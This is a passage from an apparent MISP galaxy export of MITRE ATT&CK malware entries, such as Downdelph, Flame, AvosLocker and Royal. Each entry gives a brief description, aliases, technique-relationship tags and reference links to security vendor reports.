[Downdelph](https://attack.mitre.org/software/S0134) is a first-stage downloader written in Delphi that has been used by [APT28](https://attack.mitre.org/groups/G0007) in rare instances between 2013 and 2015. (Citation: ESET Sednit Part 3)

The tag is: misp-galaxy:mitre-malware="Downdelph - S0134"

Downdelph - S0134 is also known as:

  • Downdelph

  • Delphacy

Downdelph - S0134 has relationships with:

  • similar: misp-galaxy:tool="Downdelph" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="Downdelph" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Ingress Tool Transfer - T1105" with estimative-language:likelihood-probability="almost-certain"

Table 7467. Table References

Links

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf

https://attack.mitre.org/software/S0134

Flame - S0143

[Flame](https://attack.mitre.org/software/S0143) is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame)

The tag is: misp-galaxy:mitre-malware="Flame - S0143"

Flame - S0143 is also known as:

  • Flame

  • Flamer

  • sKyWIper

Flame - S0143 has relationships with:

  • similar: misp-galaxy:tool="Flame" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Audio Capture - T1123" with estimative-language:likelihood-probability="almost-certain"

Table 7468. Table References

Links

https://attack.mitre.org/software/S0143

https://securelist.com/the-flame-questions-and-answers-51/34344/

https://www.crysys.hu/publications/files/skywiper.pdf

https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache

StrifeWater - S1034

[StrifeWater](https://attack.mitre.org/software/S1034) is a remote-access tool that has been used by [Moses Staff](https://attack.mitre.org/groups/G1009) in the initial stages of their attacks since at least November 2021.(Citation: Cybereason StrifeWater Feb 2022)

The tag is: misp-galaxy:mitre-malware="StrifeWater - S1034"

StrifeWater - S1034 is also known as:

  • StrifeWater

Table 7469. Table References

Links

https://attack.mitre.org/software/S1034

https://www.cybereason.com/blog/research/strifewater-rat-iranian-apt-moses-staff-adds-new-trojan-to-ransomware-operations

Xbash - S0341

[Xbash](https://attack.mitre.org/software/S0341) is a malware family that has targeted Linux and Microsoft Windows servers. The malware has been tied to the Iron Group, a threat actor group known for previous ransomware attacks. [Xbash](https://attack.mitre.org/software/S0341) was developed in Python and then converted into a self-contained Linux ELF executable by using PyInstaller.(Citation: Unit42 Xbash Sept 2018)

The tag is: misp-galaxy:mitre-malware="Xbash - S0341"

Xbash - S0341 is also known as:

  • Xbash

Table 7470. Table References

Links

https://attack.mitre.org/software/S0341

https://researchcenter.paloaltonetworks.com/2018/09/unit42-xbash-combines-botnet-ransomware-coinmining-worm-targets-linux-windows/

Final1stspy - S0355

[Final1stspy](https://attack.mitre.org/software/S0355) is a dropper family that has been used to deliver [DOGCALL](https://attack.mitre.org/software/S0213).(Citation: Unit 42 Nokki Oct 2018)

The tag is: misp-galaxy:mitre-malware="Final1stspy - S0355"

Final1stspy - S0355 is also known as:

  • Final1stspy

Table 7471. Table References

Links

https://attack.mitre.org/software/S0355

https://researchcenter.paloaltonetworks.com/2018/10/unit42-nokki-almost-ties-the-knot-with-dogcall-reaper-group-uses-new-malware-to-deploy-rat/

AvosLocker - S1053

[AvosLocker](https://attack.mitre.org/software/S1053) is ransomware written in C++ that has been offered via the Ransomware-as-a-Service (RaaS) model. It was first observed in June 2021 and has been used against financial services, critical manufacturing, government facilities, and other critical infrastructure sectors in the United States. As of March 2022, [AvosLocker](https://attack.mitre.org/software/S1053) had also been used against organizations in Belgium, Canada, China, Germany, Saudi Arabia, Spain, Syria, Taiwan, Turkey, the United Arab Emirates, and the United Kingdom.(Citation: Malwarebytes AvosLocker Jul 2021)(Citation: Trend Micro AvosLocker Apr 2022)(Citation: Joint CSA AvosLocker Mar 2022)

The tag is: misp-galaxy:mitre-malware="AvosLocker - S1053"

AvosLocker - S1053 is also known as:

  • AvosLocker

Table 7472. Table References

Links

https://attack.mitre.org/software/S1053

https://www.ic3.gov/Media/News/2022/220318.pdf

https://www.malwarebytes.com/blog/threat-intelligence/2021/07/avoslocker-enters-the-ransomware-scene-asks-for-partners

https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-avoslocker

Cannon - S0351

[Cannon](https://attack.mitre.org/software/S0351) is a Trojan with variants written in C# and Delphi. It was first observed in April 2018. (Citation: Unit42 Cannon Nov 2018)(Citation: Unit42 Sofacy Dec 2018)

The tag is: misp-galaxy:mitre-malware="Cannon - S0351"

Cannon - S0351 is also known as:

  • Cannon

Table 7473. Table References

Links

https://attack.mitre.org/software/S0351

https://researchcenter.paloaltonetworks.com/2018/11/unit42-sofacy-continues-global-attacks-wheels-new-cannon-trojan/

https://unit42.paloaltonetworks.com/dear-joohn-sofacy-groups-global-campaign/

HIDEDRV - S0135

[HIDEDRV](https://attack.mitre.org/software/S0135) is a rootkit used by [APT28](https://attack.mitre.org/groups/G0007). It has been deployed along with [Downdelph](https://attack.mitre.org/software/S0134) to execute and hide that malware. (Citation: ESET Sednit Part 3) (Citation: Sekoia HideDRV Oct 2016)

The tag is: misp-galaxy:mitre-malware="HIDEDRV - S0135"

HIDEDRV - S0135 is also known as:

  • HIDEDRV

HIDEDRV - S0135 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Rootkit - T1014" with estimative-language:likelihood-probability="almost-certain"

Table 7474. Table References

Links

http://www.sekoia.fr/blog/wp-content/uploads/2016/10/Rootkit-analysis-Use-case-on-HIDEDRV-v1.6.pdf

http://www.welivesecurity.com/wp-content/uploads/2016/10/eset-sednit-part3.pdf

https://attack.mitre.org/software/S0135

LiteDuke - S0513

[LiteDuke](https://attack.mitre.org/software/S0513) is a third stage backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016), primarily in 2014-2015. [LiteDuke](https://attack.mitre.org/software/S0513) used the same dropper as [PolyglotDuke](https://attack.mitre.org/software/S0518), and was found on machines also compromised by [MiniDuke](https://attack.mitre.org/software/S0051).(Citation: ESET Dukes October 2019)

The tag is: misp-galaxy:mitre-malware="LiteDuke - S0513"

LiteDuke - S0513 is also known as:

  • LiteDuke

Table 7475. Table References

Links

https://attack.mitre.org/software/S0513

https://www.welivesecurity.com/wp-content/uploads/2019/10/ESET_Operation_Ghost_Dukes.pdf

DualToy - S0315

[DualToy](https://attack.mitre.org/software/S0315) is Windows malware that installs malicious applications onto Android and iOS devices connected over USB. (Citation: PaloAlto-DualToy)

The tag is: misp-galaxy:mitre-malware="DualToy - S0315"

DualToy - S0315 has relationships with:

  • similar: misp-galaxy:malpedia="DualToy (Android)" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Replication Through Removable Media - T1458" with estimative-language:likelihood-probability="almost-certain"

Table 7476. Table References

Links

https://attack.mitre.org/software/S0315

https://researchcenter.paloaltonetworks.com/2016/09/dualtoy-new-windows-trojan-sideloads-risky-apps-to-android-and-ios-devices/

Grandoreiro - S0531

[Grandoreiro](https://attack.mitre.org/software/S0531) is a banking trojan written in Delphi that was first observed in 2016 and uses a Malware-as-a-Service (MaaS) business model. [Grandoreiro](https://attack.mitre.org/software/S0531) has confirmed victims in Brazil, Mexico, Portugal, and Spain.(Citation: Securelist Brazilian Banking Malware July 2020)(Citation: ESET Grandoreiro April 2020)

The tag is: misp-galaxy:mitre-malware="Grandoreiro - S0531"

Grandoreiro - S0531 is also known as:

  • Grandoreiro

Table 7477. Table References

Links

https://attack.mitre.org/software/S0531

https://securelist.com/the-tetrade-brazilian-banking-malware/97779/

https://www.welivesecurity.com/2020/04/28/grandoreiro-how-engorged-can-exe-get/

RedLeaves - S0153

[RedLeaves](https://attack.mitre.org/software/S0153) is a malware family used by [menuPass](https://attack.mitre.org/groups/G0045). The code overlaps with [PlugX](https://attack.mitre.org/software/S0013) and may be based upon the open source tool Trochilus. (Citation: PWC Cloud Hopper Technical Annex April 2017) (Citation: FireEye APT10 April 2017)

The tag is: misp-galaxy:mitre-malware="RedLeaves - S0153"

RedLeaves - S0153 is also known as:

  • RedLeaves

  • BUGJUICE

RedLeaves - S0153 has relationships with:

  • similar: misp-galaxy:tool="BUGJUICE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:malpedia="RedLeaves" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="RedLeaves" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="System Network Connections Discovery - T1049" with estimative-language:likelihood-probability="almost-certain"

Table 7478. Table References

Links

https://attack.mitre.org/software/S0153

https://twitter.com/ItsReallyNick/status/850105140589633536

https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html

https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf

Snip3 - S1086

[Snip3](https://attack.mitre.org/software/S1086) is a sophisticated crypter-as-a-service that has been used since at least 2021 to obfuscate and load numerous strains of malware including [AsyncRAT](https://attack.mitre.org/software/S1087), [Revenge RAT](https://attack.mitre.org/software/S0379), [Agent Tesla](https://attack.mitre.org/software/S0331), and [NETWIRE](https://attack.mitre.org/software/S0198).(Citation: Morphisec Snip3 May 2021)(Citation: Telefonica Snip3 December 2021)

The tag is: misp-galaxy:mitre-malware="Snip3 - S1086"

Snip3 - S1086 is also known as:

  • Snip3

Table 7479. Table References

Links

https://attack.mitre.org/software/S1086

https://blog.morphisec.com/revealing-the-snip3-crypter-a-highly-evasive-rat-loader

https://telefonicatech.com/blog/snip3-investigacion-malware

USBStealer - S0136

[USBStealer](https://attack.mitre.org/software/S0136) is malware that has been used by [APT28](https://attack.mitre.org/groups/G0007) since at least 2005 to extract information from air-gapped networks. It does not have the capability to communicate over the Internet and has been used in conjunction with [ADVSTORESHELL](https://attack.mitre.org/software/S0045). (Citation: ESET Sednit USBStealer 2014) (Citation: Kaspersky Sofacy)

The tag is: misp-galaxy:mitre-malware="USBStealer - S0136"

USBStealer - S0136 is also known as:

  • USBStealer

  • USB Stealer

  • Win32/USBStealer

USBStealer - S0136 has relationships with:

  • similar: misp-galaxy:tool="USBStealer" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File and Directory Discovery - T1083" with estimative-language:likelihood-probability="almost-certain"

Table 7480. Table References

Links

http://www.welivesecurity.com/2014/11/11/sednit-espionage-group-attacking-air-gapped-networks/

https://attack.mitre.org/software/S0136

https://securelist.com/sofacy-apt-hits-high-profile-targets-with-updated-toolset/72924/

Chaes - S0631

[Chaes](https://attack.mitre.org/software/S0631) is a multistage information stealer written in several programming languages that collects login credentials, credit card numbers, and other financial information. [Chaes](https://attack.mitre.org/software/S0631) was first observed in 2020, and appears to primarily target victims in Brazil as well as other e-commerce customers in Latin America.(Citation: Cybereason Chaes Nov 2020)

The tag is: misp-galaxy:mitre-malware="Chaes - S0631"

Chaes - S0631 is also known as:

  • Chaes

Table 7481. Table References

Links

https://attack.mitre.org/software/S0631

https://www.cybereason.com/hubfs/dam/collateral/reports/11-2020-Chaes-e-commerce-malware-research.pdf

Janicab - S0163

[Janicab](https://attack.mitre.org/software/S0163) is an OS X trojan that relied on a valid developer ID and oblivious users to install it. (Citation: Janicab)

The tag is: misp-galaxy:mitre-malware="Janicab - S0163"

Janicab - S0163 is also known as:

  • Janicab

Janicab - S0163 has relationships with:

  • similar: misp-galaxy:tool="Janicab" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Local Job Scheduling - T1168" with estimative-language:likelihood-probability="almost-certain"

Table 7482. Table References

Links

http://www.thesafemac.com/new-signed-malware-called-janicab/

https://attack.mitre.org/software/S0163

STARWHALE - S1037

[STARWHALE](https://attack.mitre.org/software/S1037) is a Windows Script File (WSF) backdoor that has been used by [MuddyWater](https://attack.mitre.org/groups/G0069), possibly since at least November 2021; there is also a [STARWHALE](https://attack.mitre.org/software/S1037) variant written in Golang with similar capabilities. Security researchers have also noted the use of [STARWHALE](https://attack.mitre.org/software/S1037) by UNC3313, which may be associated with [MuddyWater](https://attack.mitre.org/groups/G0069).(Citation: Mandiant UNC3313 Feb 2022)(Citation: DHS CISA AA22-055A MuddyWater February 2022)

The tag is: misp-galaxy:mitre-malware="STARWHALE - S1037"

STARWHALE - S1037 is also known as:

  • STARWHALE

  • CANOPY

Table 7483. Table References

Links

https://attack.mitre.org/software/S1037

https://www.cisa.gov/uscert/ncas/alerts/aa22-055a

https://www.mandiant.com/resources/telegram-malware-iranian-espionage

CORESHELL - S0137

[CORESHELL](https://attack.mitre.org/software/S0137) is a downloader used by [APT28](https://attack.mitre.org/groups/G0007). The older versions of this malware are known as SOURFACE and newer versions as CORESHELL.(Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)

The tag is: misp-galaxy:mitre-malware="CORESHELL - S0137"

CORESHELL - S0137 is also known as:

  • CORESHELL

  • Sofacy

  • SOURFACE

CORESHELL - S0137 has relationships with:

  • similar: misp-galaxy:tool="SOURFACE" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="CORESHELL" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 7484. Table References

Links

https://attack.mitre.org/software/S0137

https://securelist.com/a-slice-of-2017-sofacy-activity/83930/

https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

FLIPSIDE - S0173

[FLIPSIDE](https://attack.mitre.org/software/S0173) is a simple tool similar to Plink that is used by [FIN5](https://attack.mitre.org/groups/G0053) to maintain access to victims. (Citation: Mandiant FIN5 GrrCON Oct 2016)

The tag is: misp-galaxy:mitre-malware="FLIPSIDE - S0173"

FLIPSIDE - S0173 is also known as:

  • FLIPSIDE

FLIPSIDE - S0173 has relationships with:

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7485. Table References

Links

https://attack.mitre.org/software/S0173

https://www.youtube.com/watch?v=fevGZs0EQu8

POWERTON - S0371

[POWERTON](https://attack.mitre.org/software/S0371) is a custom PowerShell backdoor first observed in 2018. It has typically been deployed as a late-stage backdoor by [APT33](https://attack.mitre.org/groups/G0064). At least two variants of the backdoor have been identified, with the later version containing improved functionality.(Citation: FireEye APT33 Guardrail)

The tag is: misp-galaxy:mitre-malware="POWERTON - S0371"

POWERTON - S0371 is also known as:

  • POWERTON

Table 7486. Table References

Links

https://attack.mitre.org/software/S0371

https://www.fireeye.com/blog/threat-research/2018/12/overruled-containing-a-potentially-destructive-adversary.html

Marcher - S0317

[Marcher](https://attack.mitre.org/software/S0317) is Android malware that is used for financial fraud. (Citation: Proofpoint-Marcher)

The tag is: misp-galaxy:mitre-malware="Marcher - S0317"

Table 7487. Table References

Links

https://attack.mitre.org/software/S0317

https://www.proofpoint.com/us/threat-insight/post/credential-phishing-and-android-banking-trojan-combine-austrian-mobile-attacks

Royal - S1073

[Royal](https://attack.mitre.org/software/S1073) is ransomware that first appeared in early 2022; a version that also targets ESXi servers was later observed in February 2023. [Royal](https://attack.mitre.org/software/S1073) employs partial encryption and multiple threads to evade detection and speed encryption. [Royal](https://attack.mitre.org/software/S1073) has been used in attacks against multiple industries worldwide, including critical infrastructure. Security researchers have identified similarities in the encryption routines and TTPs used in [Royal](https://attack.mitre.org/software/S1073) and [Conti](https://attack.mitre.org/software/S0575) attacks and noted a possible connection between their operators.(Citation: Microsoft Royal ransomware November 2022)(Citation: Cybereason Royal December 2022)(Citation: Kroll Royal Deep Dive February 2023)(Citation: Trend Micro Royal Linux ESXi February 2023)(Citation: CISA Royal AA23-061A March 2023)

The tag is: misp-galaxy:mitre-malware="Royal - S1073"

Royal - S1073 is also known as:

  • Royal

Table 7488. Table References

Links

https://attack.mitre.org/software/S1073

https://www.cisa.gov/news-events/cybersecurity-advisories/aa23-061a

https://www.cybereason.com/blog/royal-ransomware-analysis

https://www.kroll.com/en/insights/publications/cyber/royal-ransomware-deep-dive

https://www.microsoft.com/en-us/security/blog/2022/11/17/dev-0569-finds-new-ways-to-deliver-royal-ransomware-various-payloads/

https://www.trendmicro.com/en_us/research/23/b/royal-ransomware-expands-attacks-by-targeting-linux-esxi-servers.html

OLDBAIT - S0138

[OLDBAIT](https://attack.mitre.org/software/S0138) is a credential harvester used by [APT28](https://attack.mitre.org/groups/G0007). (Citation: FireEye APT28) (Citation: FireEye APT28 January 2017)

The tag is: misp-galaxy:mitre-malware="OLDBAIT - S0138"

OLDBAIT - S0138 is also known as:

  • OLDBAIT

  • Sasfis

OLDBAIT - S0138 has relationships with:

  • similar: misp-galaxy:tool="OLDBAIT" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Obfuscated Files or Information - T1027" with estimative-language:likelihood-probability="almost-certain"

Table 7489. Table References

Links

https://attack.mitre.org/software/S0138

https://web.archive.org/web/20151022204649/https://www.fireeye.com/content/dam/fireeye-www/global/en/current-threats/pdfs/rpt-apt28.pdf

https://www2.fireeye.com/rs/848-DID-242/images/APT28-Center-of-Storm-2017.pdf

FlawedAmmyy - S0381

[FlawedAmmyy](https://attack.mitre.org/software/S0381) is a remote access tool (RAT) that was first seen in early 2016. The code for [FlawedAmmyy](https://attack.mitre.org/software/S0381) was based on leaked source code for a version of Ammyy Admin, a remote access software.(Citation: Proofpoint TA505 Mar 2018)

The tag is: misp-galaxy:mitre-malware="FlawedAmmyy - S0381"

FlawedAmmyy - S0381 is also known as:

  • FlawedAmmyy

Table 7490. Table References

Links

https://attack.mitre.org/software/S0381

https://www.proofpoint.com/us/threat-insight/post/leaked-ammyy-admin-source-code-turned-malware

Chameleon - S1083

[Chameleon](https://attack.mitre.org/software/S1083) is an Android banking trojan that can leverage Android’s Accessibility Services to perform malicious activities. Believed to have been first active in January 2023, [Chameleon](https://attack.mitre.org/software/S1083) has been observed targeting users in Australia and Poland by masquerading as official apps.(Citation: cyble_chameleon_0423)

The tag is: misp-galaxy:mitre-malware="Chameleon - S1083"

Chameleon - S1083 is also known as:

  • Chameleon

Table 7491. Table References

Links

https://attack.mitre.org/software/S1083

https://cyble.com/blog/chameleon-a-new-android-malware-spotted-in-the-wild/

HAWKBALL - S0391

[HAWKBALL](https://attack.mitre.org/software/S0391) is a backdoor that was observed in targeting of the government sector in Central Asia.(Citation: FireEye HAWKBALL Jun 2019)

The tag is: misp-galaxy:mitre-malware="HAWKBALL - S0391"

HAWKBALL - S0391 is also known as:

  • HAWKBALL

Table 7492. Table References

Links

https://attack.mitre.org/software/S0391

https://www.fireeye.com/blog/threat-research/2019/06/government-in-central-asia-targeted-with-hawkball-backdoor.html

Allwinner - S0319

[Allwinner](https://attack.mitre.org/software/S0319) is a company that supplies processors used in Android tablets and other devices. A Linux kernel distributed by [Allwinner](https://attack.mitre.org/software/S0319) for use on these devices reportedly contained a backdoor. (Citation: HackerNews-Allwinner)

The tag is: misp-galaxy:mitre-malware="Allwinner - S0319"

Table 7493. Table References

Links

https://attack.mitre.org/software/S0319

https://thehackernews.com/2016/05/android-kernal-exploit.html

Bumblebee - S1039

[Bumblebee](https://attack.mitre.org/software/S1039) is a custom loader written in C++ that has been used by multiple threat actors, including possible initial access brokers, to download and execute additional payloads since at least March 2022. [Bumblebee](https://attack.mitre.org/software/S1039) has been linked to ransomware operations including [Conti](https://attack.mitre.org/software/S0575), Quantum, and Mountlocker and derived its name from the appearance of "bumblebee" in the user-agent.(Citation: Google EXOTIC LILY March 2022)(Citation: Proofpoint Bumblebee April 2022)(Citation: Symantec Bumblebee June 2022)

The tag is: misp-galaxy:mitre-malware="Bumblebee - S1039"

Bumblebee - S1039 is also known as:

  • Bumblebee

Table 7494. Table References

Links

https://attack.mitre.org/software/S1039

https://blog.google/threat-analysis-group/exposing-initial-access-broker-ties-conti/

https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/bumblebee-loader-cybercrime

https://www.proofpoint.com/us/blog/threat-insight/bumblebee-is-still-transforming

PowerDuke - S0139

[PowerDuke](https://attack.mitre.org/software/S0139) is a backdoor that was used by [APT29](https://attack.mitre.org/groups/G0016) in 2016. It has primarily been delivered through Microsoft Word or Excel attachments containing malicious macros. (Citation: Volexity PowerDuke November 2016)

The tag is: misp-galaxy:mitre-malware="PowerDuke - S0139"

PowerDuke - S0139 is also known as:

  • PowerDuke

PowerDuke - S0139 has relationships with:

  • similar: misp-galaxy:malpedia="PowerDuke" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="File Deletion - T1107" with estimative-language:likelihood-probability="almost-certain"

Table 7495. Table References

Links

https://attack.mitre.org/software/S0139

https://www.volexity.com/blog/2016/11/09/powerduke-post-election-spear-phishing-campaigns-targeting-think-tanks-and-ngos/

FlyTrap - S1093

[FlyTrap](https://attack.mitre.org/software/S1093) is an Android trojan, first detected in March 2021, that uses social engineering tactics to compromise Facebook accounts. [FlyTrap](https://attack.mitre.org/software/S1093) was initially detected through infected apps on the Google Play store, and is believed to have impacted over 10,000 victims across at least 140 countries.(Citation: Trend Micro FlyTrap)

The tag is: misp-galaxy:mitre-malware="FlyTrap - S1093"

FlyTrap - S1093 is also known as:

  • FlyTrap

Table 7496. Table References

Links

https://attack.mitre.org/software/S1093

https://news.trendmicro.com/2021/08/17/flytrap-android-malware-is-taking-over-facebook-accounts-protect-yourself-with-a-malware-scanner/

BabyShark - S0414

[BabyShark](https://attack.mitre.org/software/S0414) is a Microsoft Visual Basic (VB) script-based malware family that is believed to be associated with several North Korean campaigns. (Citation: Unit42 BabyShark Feb 2019)

The tag is: misp-galaxy:mitre-malware="BabyShark - S0414"

BabyShark - S0414 is also known as:

  • BabyShark

Table 7497. Table References

Links

https://attack.mitre.org/software/S0414

https://unit42.paloaltonetworks.com/babyshark-malware-part-two-attacks-continue-using-kimjongrat-and-pcrat/

https://unit42.paloaltonetworks.com/new-babyshark-malware-targets-u-s-national-security-think-tanks/

ChChes - S0144

[ChChes](https://attack.mitre.org/software/S0144) is a Trojan that appears to be used exclusively by [menuPass](https://attack.mitre.org/groups/G0045). It was used to target Japanese organizations in 2016. Its lack of persistence methods suggests it may be intended as a first-stage tool. (Citation: Palo Alto menuPass Feb 2017) (Citation: JPCERT ChChes Feb 2017) (Citation: PWC Cloud Hopper Technical Annex April 2017)

The tag is: misp-galaxy:mitre-malware="ChChes - S0144"

ChChes - S0144 is also known as:

  • ChChes

  • Scorpion

  • HAYMAKER

ChChes - S0144 has relationships with:

  • similar: misp-galaxy:malpedia="ChChes" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:tool="HAYMAKER" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7498. Table References

Links

http://blog.jpcert.or.jp/2017/02/chches-malware--93d6.html

http://researchcenter.paloaltonetworks.com/2017/02/unit42-menupass-returns-new-malware-new-attacks-japanese-academics-organizations/

https://attack.mitre.org/software/S0144

https://twitter.com/ItsReallyNick/status/850105140589633536

https://www.fireeye.com/blog/threat-research/2017/04/apt10_menupass_grou.html

https://www.pwc.co.uk/cyber-security/pdf/pwc-uk-operation-cloud-hopper-technical-annex-april-2017.pdf

FunnyDream - S1044

[FunnyDream](https://attack.mitre.org/software/S1044) is a backdoor with multiple components that was used during the [FunnyDream](https://attack.mitre.org/campaigns/C0007) campaign since at least 2019, primarily for execution and exfiltration.(Citation: Bitdefender FunnyDream Campaign November 2020)

The tag is: misp-galaxy:mitre-malware="FunnyDream - S1044"

FunnyDream - S1044 is also known as:

  • FunnyDream

Table 7499. Table References

Links

https://attack.mitre.org/software/S1044

https://www.bitdefender.com/files/News/CaseStudies/study/379/Bitdefender-Whitepaper-Chinese-APT.pdf

PowerShower - S0441

[PowerShower](https://attack.mitre.org/software/S0441) is a PowerShell backdoor used by [Inception](https://attack.mitre.org/groups/G0100) for initial reconnaissance and to download and execute second stage payloads.(Citation: Unit 42 Inception November 2018)(Citation: Kaspersky Cloud Atlas August 2019)

The tag is: misp-galaxy:mitre-malware="PowerShower - S0441"

PowerShower - S0441 is also known as:

  • PowerShower

Table 7500. Table References

Links

https://attack.mitre.org/software/S0441

https://securelist.com/recent-cloud-atlas-activity/92016/

https://unit42.paloaltonetworks.com/unit42-inception-attackers-target-europe-year-old-office-vulnerability/

BOOSTWRITE - S0415

[BOOSTWRITE](https://attack.mitre.org/software/S0415) is a loader crafted to be launched via abuse of the DLL search order of applications used by [FIN7](https://attack.mitre.org/groups/G0046).(Citation: FireEye FIN7 Oct 2019)

The tag is: misp-galaxy:mitre-malware="BOOSTWRITE - S0415"

BOOSTWRITE - S0415 is also known as:

  • BOOSTWRITE

Table 7501. Table References

Links

https://attack.mitre.org/software/S0415

https://www.fireeye.com/blog/threat-research/2019/10/mahalo-fin7-responding-to-new-tools-and-techniques.html

POWERSOURCE - S0145

[POWERSOURCE](https://attack.mitre.org/software/S0145) is a PowerShell backdoor that is a heavily obfuscated and modified version of the publicly available tool DNS_TXT_Pwnage. It was observed in February 2017 in spearphishing campaigns against personnel involved with United States Securities and Exchange Commission (SEC) filings at various organizations. The malware was delivered when macros were enabled by the victim and a VBS script was dropped. (Citation: FireEye FIN7 March 2017) (Citation: Cisco DNSMessenger March 2017)

The tag is: misp-galaxy:mitre-malware="POWERSOURCE - S0145"

POWERSOURCE - S0145 is also known as:

  • POWERSOURCE

  • DNSMessenger

POWERSOURCE - S0145 has relationships with:

  • similar: misp-galaxy:malpedia="DNSMessenger" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="DNSMessenger" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="TEXTMATE - S0146" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7502. Table References

Links

http://blog.talosintelligence.com/2017/03/dnsmessenger.html

https://attack.mitre.org/software/S0145

https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html

Drinik - S1054

[Drinik](https://attack.mitre.org/software/S1054) is an evolving Android banking trojan that was observed targeting customers of around 27 banks in India in August 2021. Initially seen as an SMS stealer in 2016, [Drinik](https://attack.mitre.org/software/S1054) resurfaced as a banking trojan with more advanced capabilities included in subsequent versions between September 2021 and August 2022.(Citation: cyble_drinik_1022)

The tag is: misp-galaxy:mitre-malware="Drinik - S1054"

Drinik - S1054 is also known as:

  • Drinik

Table 7503. Table References

Links

https://attack.mitre.org/software/S1054

https://blog.cyble.com/2022/10/27/drinik-malware-returns-with-advanced-capabilities-targeting-indian-taxpayers/

LoudMiner - S0451

[LoudMiner](https://attack.mitre.org/software/S0451) is a cryptocurrency miner which uses virtualization software to siphon system resources. The miner has been bundled with pirated copies of Virtual Studio Technology (VST) for Windows and macOS.(Citation: ESET LoudMiner June 2019)

The tag is: misp-galaxy:mitre-malware="LoudMiner - S0451"

LoudMiner - S0451 is also known as:

  • LoudMiner

Table 7504. Table References

Links

https://attack.mitre.org/software/S0451

https://www.welivesecurity.com/2019/06/20/loudminer-mining-cracked-vst-software/

WellMess - S0514

[WellMess](https://attack.mitre.org/software/S0514) is a lightweight malware family with variants written in .NET and Golang that has been in use since at least 2018 by [APT29](https://attack.mitre.org/groups/G0016).(Citation: CISA WellMess July 2020)(Citation: PWC WellMess July 2020)(Citation: NCSC APT29 July 2020)

The tag is: misp-galaxy:mitre-malware="WellMess - S0514"

WellMess - S0514 is also known as:

  • WellMess

Table 7505. Table References

Links

https://attack.mitre.org/software/S0514

https://us-cert.cisa.gov/ncas/analysis-reports/ar20-198b

https://www.ncsc.gov.uk/files/Advisory-APT29-targets-COVID-19-vaccine-development-V1-1.pdf

https://www.pwc.co.uk/issues/cyber-security-services/insights/cleaning-up-after-wellmess.html

TEXTMATE - S0146

[TEXTMATE](https://attack.mitre.org/software/S0146) is a second-stage PowerShell backdoor that is memory-resident. It was observed being used along with [POWERSOURCE](https://attack.mitre.org/software/S0145) in February 2017. (Citation: FireEye FIN7 March 2017)

The tag is: misp-galaxy:mitre-malware="TEXTMATE - S0146"

TEXTMATE - S0146 is also known as:

  • TEXTMATE

  • DNSMessenger

TEXTMATE - S0146 has relationships with:

  • similar: misp-galaxy:malpedia="DNSMessenger" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:rat="DNSMessenger" with estimative-language:likelihood-probability="likely"

  • similar: misp-galaxy:mitre-malware="POWERSOURCE - S0145" with estimative-language:likelihood-probability="likely"

  • uses: misp-galaxy:mitre-attack-pattern="Application Layer Protocol - T1071" with estimative-language:likelihood-probability="almost-certain"

Table 7506. Table References

Links

http://blog.talosintelligence.com/2017/03/dnsmessenger.html

https://attack.mitre.org/software/S0146

https://web.archive.org/web/20180808125108/https:/www.fireeye.com/blog/threat-research/2017/03/fin7_spear_phishing.html

CostaBricks - S0614

[CostaBricks](https://attack.mitre.org/software/S0614) is a loader that was used to deploy 32-bit backdoors in the [CostaRicto](https://attack.mitre.org/groups/G0132) campaign.(Citation: BlackBerry CostaRicto November 2020)

The tag is: misp-galaxy:mitre-malware="CostaBricks - S0614"

CostaBricks - S0614 is also known as:

  • CostaBricks

Table 7507. Table References

Links

https://attack.mitre.org/software/S0614

https://blogs.blackberry.com/en/2020/11/the-costaricto-campaign-cyber-espionage-outsourced

SDBbot - S0461

